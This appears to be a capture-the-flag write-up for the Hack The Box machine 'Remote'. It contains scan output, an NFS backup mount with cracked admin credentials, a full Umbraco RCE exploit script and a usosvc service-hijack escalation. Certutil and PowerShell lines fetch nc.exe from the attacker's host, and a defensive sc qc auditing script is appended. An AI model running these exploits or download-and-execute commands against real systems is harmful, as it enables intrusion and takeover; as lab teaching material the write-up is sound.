Hack the Box - Remote
Nmap
kali@kali:/var/www/html$ nmap -v -A 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 11:51 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating Ping Scan at 11:51
Scanning 10.10.10.180 [2 ports]
Completed Ping Scan at 11:51, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 10.34s elapsed
Initiating Connect Scan at 11:51
Scanning 10.10.10.180 [1000 ports]
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Increasing send delay for 10.10.10.180 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 11:51, 23.06s elapsed (1000 total ports)
Initiating Service scan at 11:51
Scanning 7 services on 10.10.10.180
Completed Service scan at 11:52, 54.54s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.10.180.
Initiating NSE at 11:52
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 11:52, 8.94s elapsed
Initiating NSE at 11:52
Completed NSE at 11:54, 97.89s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Nmap scan report for 10.10.10.180
Host is up (0.17s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_04-18-20 11:19AM 33 readme.txt
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -15m12s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-18T15:37:32
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.61 seconds
80
kali@kali:/var/www/html$ searchsploit umbraco
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | exploits/php/webapps/44988.txt
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
21
kali@kali:/var/www/html$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put ~/Desktop/nc.exe
local: /home/kali/Desktop/nc.exe remote: /home/kali/Desktop/nc.exe
200 PORT command successful.
550 Access is denied.
ftp>
Up to this point, nothing exploitable has been found on ports 80 and 21.
111
Port 111 reference material
kali@kali:~/Downloads$ /usr/sbin/showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
kali@kali:~/Downloads$ sudo mount -t nfs 10.10.10.180:/ ~/Download/test
kali@kali:~/Desktop/test$ ls -al
total 92
drwx------ 14 kali kali 4096 Apr 12 09:33 .
drwxr-xr-x 3 kali kali 4096 Apr 18 11:57 ..
drwx------ 2 kali kali 4096 Apr 12 09:33 App_Browsers
drwx------ 7 kali kali 4096 Apr 12 09:35 App_Data
drwx------ 6 kali kali 4096 Apr 12 09:11 App_Plugins
drwx------ 3 kali kali 4096 Apr 12 09:11 aspnet_client
drwx------ 4 kali kali 4096 Apr 12 09:12 bin
drwx------ 6 kali kali 4096 Apr 12 09:12 Config
drwx------ 2 kali kali 4096 Apr 12 09:13 css
-rwx------ 1 kali kali 152 Apr 12 09:33 default.aspx
-rwx------ 1 kali kali 89 Apr 12 09:33 Global.asax
drwx------ 18 kali kali 4096 Apr 12 09:13 Media
drwx------ 2 kali kali 4096 Apr 12 09:13 scripts
drwx------ 23 kali kali 4096 Apr 12 09:30 Umbraco
drwx------ 27 kali kali 4096 Apr 12 09:33 Umbraco_Client
drwx------ 4 kali kali 4096 Apr 12 09:33 Views
-rwx------ 1 kali kali 28539 Apr 12 09:33 Web.config
Administrator credentials recovered from the site backup (the cracked hash yields the password):
Administrator admin b8be16afba8c314ad33d812f22a04991b9 baconandcheese
Administrator admin@htb.local b8be16afba8c314ad33d812f22a04991b9 baconandcheese
Exploit: 46153.py
kali@kali:/usr/share/exploitdb/exploits/aspx/webapps$ cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests
from bs4 import BeautifulSoup


def print_dict(dico):
    print(dico.items())


print("Start")

# Payload: the original PoC launched calc.exe. It is changed here to run cmd.exe with
# certutil so the target fetches nc.exe into c:/windows/temp. FileName has to be
# cmd.exe, otherwise the "/c ..." arguments are never interpreted.
payload = '\
public string xml() \
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.152/nc.exe c:/windows/temp/nc.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
\
'

login = "admin@htb.local"
password = "baconandcheese"
host = "http://10.10.10.180"

# Step 1 - Get Main page (establishes the session cookies)
s = requests.session()
url_main = host + "/umbraco/"
r1 = s.get(url_main)
print_dict(r1.cookies)

# Step 2 - Process Login against the back-office API
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
r2 = s.post(url_login, json=loginfo)

# Step 3 - Go to vulnerable web page and collect the ASP.NET form state and XSRF token
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = {
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": "",
    "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT",
}

# Step 4 - Launch the attack (the XSLT visualizer compiles and runs the payload)
r4 = s.post(url_xslt, data=data, headers=headers)
print("End")
At first I wanted to download it via PowerShell, but it never succeeded.
start powershell $client = new-object System.Net.WebClient && client.DownloadFile('http://192.168.11.128/nc.exe', 'C:\Users\Administrator\Desktop')
cmd.exe /c start powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.11.128/nc.exe', 'd:\nc.exe')
Configuring the usosvc service
c:\Windows\Temp>sc stop usosvc
c:\Windows\Temp>sc config usosvc binPath= "C:\Windows\Temp\shell.exe"
c:\Windows\Temp>sc qc usosvc
sc qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\windows\temp\shell.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
c:\Windows\Temp>sc start usosvc
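The `sc qc` output above is also what a defender would look at: usosvc is a WIN32_SHARE_PROCESS service, which is always hosted by svchost.exe, yet its BINARY_PATH_NAME now points at an executable in C:\Windows\Temp. As an added example (not part of this write-up), the script below parses `sc qc` output and flags both conditions; the two samples are constructed from the output on this page and from a stock usosvc entry.

```python
import re

# Directories a low-privilege user can normally write to (constructed list; extend as needed).
WRITABLE_PREFIXES = ("c:\\windows\\temp", "c:\\users\\", "c:\\programdata\\", "c:\\temp")

# Constructed from the `sc qc usosvc` output shown above, after the binPath change.
SAMPLE_HIJACKED = r"""
SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        BINARY_PATH_NAME   : c:\windows\temp\shell.exe
        LOAD_ORDER_GROUP   :
        DISPLAY_NAME       : Update Orchestrator Service
        SERVICE_START_NAME : LocalSystem
"""

# Constructed: what a stock usosvc entry looks like (hosted by svchost.exe).
SAMPLE_CLEAN = r"""
SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value; header and echoed command lines are skipped."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def audit_service(sc_qc_output):
    """Return a list of findings for one service; an empty list means the config looks normal."""
    f = parse_sc_qc(sc_qc_output)
    name = f.get("SERVICE_NAME", "?")
    path = f.get("BINARY_PATH_NAME", "").strip('"').lower()
    issues = []
    if any(path.startswith(p) for p in WRITABLE_PREFIXES):
        issues.append(f"{name}: service binary lives in a user-writable directory: {path}")
    # Shared-process services are hosted by svchost.exe; any other image means binPath was replaced.
    if "WIN32_SHARE_PROCESS" in f.get("TYPE", "") and "svchost.exe" not in path:
        issues.append(f"{name}: shared-process service is not hosted by svchost.exe: {path}")
    return issues
```

Run `audit_service` over the output of `sc qc <name>` for every service (`sc query` lists them) to spot the same hijack pattern on other hosts.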
sc command reference material
wmic command reference material
Get ROOT